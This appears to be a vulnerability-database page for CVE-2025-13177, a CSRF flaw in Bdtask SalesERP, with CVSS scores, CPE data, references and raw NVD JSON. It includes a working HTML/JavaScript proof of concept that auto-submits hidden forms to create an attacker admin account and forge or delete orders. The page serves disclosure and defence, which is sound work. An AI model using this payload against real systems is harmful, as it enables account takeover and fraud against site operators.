Security Vulnerability Report
CVE-2025-13177 CVSS 4.3 MEDIUM

Published: 2025-11-14 19:15:58
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was detected in Bdtask/CodeCanyon SalesERP up to 20250728. This affects an unknown part. The manipulation results in cross-site request forgery. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
4.3 (VulDB, CVSS 3.1, secondary). The NVD primary CVSS 3.1 assessment in the raw record below scores the same issue 8.8 HIGH.
Severity
MEDIUM (VulDB) / HIGH (NVD)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N (VulDB, 4.3)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (NVD primary, 8.8)
Both vectors agree on exploitability (network-reachable, low complexity, no privileges, a victim click or page visit required); they differ only in the assumed impact of a forged request, which is why the headline score depends on which assessor you read. The raw record also carries a VulDB CVSS 4.0 vector scored 2.1 LOW (UI:P, exploit maturity PROOF_OF_CONCEPT) and a CVSS 2.0 vector scored 5.0 MEDIUM.
Weaknesses
CWE-352 (Cross-Site Request Forgery; NVD primary and VulDB), CWE-862 (Missing Authorization; VulDB only)

Configurations (Affected Products)

cpe:2.3:a:saleserp:bdtask:*:*:*:*:*:*:*:* - VULNERABLE
Bdtask CodeCanyon SalesERP <= 2025-07-28 (all versions up to and including the 20250728 build named in the description). Note that the NVD CPE match in the raw record below uses versionEndIncluding 2025-10-16, a later cutoff than the description's date; no fixed version is listed and the vendor did not respond to the disclosure.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CSRF PoC for CVE-2025-13177 - Bdtask CodeCanyon SalesERP -->
<!-- This PoC demonstrates a CSRF attack on SalesERP user management.
     The endpoint paths and parameter names below are those used by the
     published PoC; the advisory itself names no endpoint ("affects an
     unknown part"), so adjust them to the deployment under test. -->
<!DOCTYPE html>
<html>
<head>
  <title>SalesERP CSRF Attack PoC</title>
  <style>
    body { font-family: Arial, sans-serif; padding: 20px; }
    .malicious-form { display: none; }
    .info { color: #666; font-size: 12px; }
  </style>
</head>
<body>
  <h2>CVE-2025-13177 CSRF PoC</h2>
  <p class="info">Target: Bdtask/CodeCanyon SalesERP</p>

  <!-- Hidden iframes receive the form responses so that submitting the
       first form does not navigate this page away before the second
       form is submitted. -->
  <iframe name="sink1" style="display: none;"></iframe>
  <iframe name="sink2" style="display: none;"></iframe>

  <!-- Auto-submit form targeting the SalesERP user creation endpoint -->
  <form id="csrfForm" class="malicious-form" target="sink1"
        action="http://target-server/saleserp/index.php/admin/user/create" method="POST">
    <input type="hidden" name="username" value="attacker_created">
    <input type="hidden" name="email" value="[email protected]">
    <input type="hidden" name="password" value="P@ssw0rd123">
    <input type="hidden" name="user_role" value="admin">
    <!-- Empty token: the attack only works if the server does not
         validate it (the attacker page cannot read a real one). -->
    <input type="hidden" name="csrf_token" value="">
  </form>

  <!-- Form targeting SalesERP order processing -->
  <form id="orderForm" class="malicious-form" target="sink2"
        action="http://target-server/saleserp/index.php/sales/order/create" method="POST">
    <input type="hidden" name="customer_id" value="999">
    <input type="hidden" name="product_ids" value="1,2,3">
    <input type="hidden" name="quantity" value="100">
    <input type="hidden" name="total_amount" value="0">
  </form>

  <script>
    // Auto-submit both forms when the page loads. The browser attaches the
    // victim's SalesERP session cookie to each POST (subject to the cookie's
    // SameSite attribute), which is what makes the forged request succeed.
    window.onload = function () {
      console.log('CSRF PoC executing...');
      document.getElementById('csrfForm').submit();
      setTimeout(function () {
        document.getElementById('orderForm').submit();
      }, 1000);
    };
  </script>
  <p>Redirecting...</p>

  <script>
    // Alternative: use the fetch API instead of visible form submissions.
    // A form-urlencoded POST is a CORS "simple request", so no preflight is
    // sent and the request reaches the server even though this page cannot
    // read the response. mode: 'no-cors' makes the promise resolve with an
    // opaque response instead of rejecting after the request was already
    // delivered.
    async function exploitCSRF() {
      const targets = [
        {
          url: 'http://target-server/saleserp/index.php/admin/user/create',
          data: new URLSearchParams({
            'username': 'hacked_user',
            'email': '[email protected]',
            'password': 'Hacked123!',
            'user_role': 'admin'
          })
        },
        {
          url: 'http://target-server/saleserp/index.php/sales/order/delete/1',
          data: new URLSearchParams({ 'confirm': 'yes' })
        }
      ];
      for (const target of targets) {
        try {
          await fetch(target.url, {
            method: 'POST',
            mode: 'no-cors',
            credentials: 'include',
            headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
            body: target.data
          });
          console.log('Request sent to: ' + target.url);
        } catch (e) {
          console.error('Error:', e);
        }
      }
    }
    // Uncomment to use the fetch-based attack
    // exploitCSRF();
  </script>
</body>
</html>
```

References

https://github.com/4m3rr0r/PoCVulDb/issues/1 (Exploit, Issue Tracking, Third Party Advisory)
https://vuldb.com/?id.332467 (Third Party Advisory, VDB Entry)
https://vuldb.com/?ctiid.332467 (Permissions Required, VDB Entry)
https://vuldb.com/?submit.684819 (Third Party Advisory, VDB Entry)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13177", "sourceIdentifier": "[email protected]", "published": "2025-11-14T19:15:57.977", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Bdtask/CodeCanyon SalesERP up to 20250728. This affects an unknown part. The manipulation results in cross-site request forgery. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}, {"lang": "en", "value": "CWE-862"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:a:bdtask:saleserp:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-10-16", "matchCriteriaId": "151D4B11-738A-4D27-829E-056E343786C4"}]}]}], "references": [{"url": "https://github.com/4m3rr0r/PoCVulDb/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332467", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332467", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.684819", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/4m3rr0r/PoCVulDb/issues/1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}